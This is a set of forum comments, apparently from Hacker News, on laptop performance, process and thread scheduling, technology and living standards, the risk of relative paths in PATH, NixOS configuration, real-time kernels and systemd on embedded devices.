I think you're bringing up a great question here. If you ask a random person on the street "is your laptop fast", the answer probably has more to do with what software that person is running, than what hardware.
My Apple silicon laptop feels super fast because I just open the lid and it's running. That's not because the CPU ran instructions super fast, it's because I can just close the lid and the battery lasts forever.
My guess would be that ARM Chromebooks might run substantially more cut-down firmware? While intel might need a more full-fat EFI stack? But I haven't used either and am just speculating.
I think in the example the OP is making, the work is not useless. They're saying if you had a system doing the same work, with maybe 60 processes, you're better off splitting that into 600 processes and a couple thousand threads, since that will allow granular classification of tasks by their latency sensitivity
But it is, he's talking about real systems with real processes in a generic way, not a singular hypothetical where suddenly all that work must be done, so you can also apply you general knowledge that some of those background processes aren't useful (but can't even be disabled due to system lockdown)
I think you're right that the article didn't provide criteria for when this type of system is better or worse than another. For example, the cost of splitting a work into threads and switching between threads needs to be factored in. If that cost is very high, then the multi-thread system could very well be worse. And there are other factors too.
However, given the trend in modern software engineering to break work into units and the fact that on modern hardware thread switches happen very quickly, being able to distribute that work across different compute clusters that make different optimization choices is a good thing and allows schedulers to get results closer to optimal.
So really it boils down to if the gains in doing the work on different compute outweighs the cost splitting and distributing the work, then it's a win. And for most modern software on most modern hardware, the win is very significant.
> (...) a singular hypothetical where suddenly all that work must be done (...)
This is far from being a hypothesis. This is an accurate description of your average workstation. I recommend you casually check the list of processes running at any given moment in any random desktop or laptop you find in a 5 meter radius.
I've done more than that - after noticing high CPU use I investigated what those processes do, discovered services that I never need and tried to disable them. Now try to actually prove your point
It's true, they don't "make 'em like they used to". They make them in new, more efficient ways which have contributed to improving global trends in metrics such as literacy, child mortality, life expectancy, extreme poverty, and food supply.
If you are arguing that standard of living today is lower than in the past, I think that is a very steep uphill battle to argue
If your worries are about ecology and sustainability I agree that is a concern we need to address more effectively than we have in the past. Technology will almost certainly be part of that solution via things like fusion energy. Success is not assured and we cannot just sit back and say "we live in the best of all possible worlds with a glorious manifest destiny", but I don't think that the future is particularly bleak compared to the past
I worry that humanity has a track record of diving head first into new technologies without worrying about externalities like the environment or job displacement.
I wish we were more thoughtful and focused more on minimizing the downsides of new technologies.
Instead it seems we’re headed full steam towards huge amounts of energy use and job displacement. And the main bonus is rich people get richer.
I’m not sure if having software be cheaper is beneficial. Is it good for malware to be easier to produce? I’d personally choose higher quality software over more software.
I’m not convinced cheaper mass produced clothing has been a net positive. Will AI be a positive? Time will tell. In the short term there are some obvious negatives.
> If you are arguing that standard of living today is lower than in the past, I think that is a very steep uphill battle to argue
We'd first have to agree on a definition for "standard of living". There are certainly many (important to me) aspects in which we have regressed and being able to buy cheap tech crap does not make up for it.
One could set an env var to their local bin dir which is otherwise not in the path, like L=/home/ahepp/.local/bin, and then do $L/mycommand. Doesn't meet the OP's requirement of no shift key.
Or prefix files in the local bin dir with a couple letters from your username, like /home/ahepp/.local/bin/ah-mycommand
I think it's substantially riskier. At the very least, it means you are trusting any directory you cd into, rather than just trusting your $home/bin.
Stuff that would not typically raise eyebrows has been made risky. You might cd into less privileged user's $home, or some web service's data directory, and suddenly you've given whoever had access to those users, access to your user.
Maybe you could argue "well, I just won't cd outside of my $home", but the sheer unexpectedness of the behavior seems deeply undesirable to me.
NixOS simultaneously smooths the path to using absolute paths while putting some (admittedly minor) speed-bumps in the way when avoiding them. If you package something up that uses relative paths it will probably break for someone else relatively quickly.
What that means is that you end up with a system in which absolute paths are used almost everywhere.
This is why the killer feature of NixOS isn't that you can configure things from a central place; RedHat had a tool to do that at least 25 years ago; it's that since most of /etc/ is read-only, you must configure everything from a central place, which has two important effects:
1. The tool for configuring things in a central place can be much simplified since it doesn't have to worry about people changing things out from under it
2. Any time someone runs into something that is painful with the tool for configuring things in a central place, they have to improve the tool (or abandon NixOS).
How are you defining "general-purpose OS"? Are you saying IoT and robotics shouldn't use a Linux kernel at all? Or just not your general purpose distros? I would be interested to hear more of your logic here, since it seems like using the same FOSS operating system across various uses provides a lot of value to everyone.
I think, that I want at least hard-real-time OS in any computer which can move physical objects. Linux kernel cannot be it: hard RTOS cannot have virtual memory (mapping walks is unpredictable in case of TLB miss) and many other mechanisms which are desired in desktop/server OS are ill-suited for RTOS.
Scheduler must be tuned differently, I/O must be done differently. It is not only «this process have RT priority, don't preempt it», it is design of whole kernel.
Better, this OS must be verified (as seL4). But I understand, that it is pipe dream. Heck, even RTOS is pipe dream.
About IoT: this word means nothing. Is connected TV IoT? I have no problems with Linux inside it. My lightbulb which can be turned on and off via ZigBee? Why do I need Linux here? My battery-powered weather station (because I cannot put 220v wiring in backyard)? Better no, I need as-low-power-as-possible solution.
To be honest, O think even using one kernel for different servers is technically wrong, because RDBMS, file server and computational node needs very different priories in kernel tuning too. I prefer network stack of FreeBSD, file server capabilities (native ZFS & Ko) of Solaris, transaction processing of Tandem/HPE NonStop OS and Wayland/GPU/Desktop support of Linux. But everything bar Linux is effectively dead. And Linux is only «good enough» in everything, mediocre.
I understand value of unification, but as engineer I'm sad.
I work on embedded devices, fairly powerful ones to be fair, and I think systemd is really great, useful software. There's a ton of stuff I can do quite easily with systemd that would take a ton of effort to do reliably with sysvinit.
It's definitely pretty opinionated, and I frequently have to explain to people why "After=" doesn't mean "Wants=", but the result is way more robust than any alternative I'm familiar with.
If you're on a system so constrained that running systemd is a burden, you are probably already using something like buildroot/yocto and have a high degree of control about what init system you use.
My Apple silicon laptop feels super fast because I just open the lid and it's running. That's not because the CPU ran instructions super fast, it's because I can just close the lid and the battery lasts forever.
reply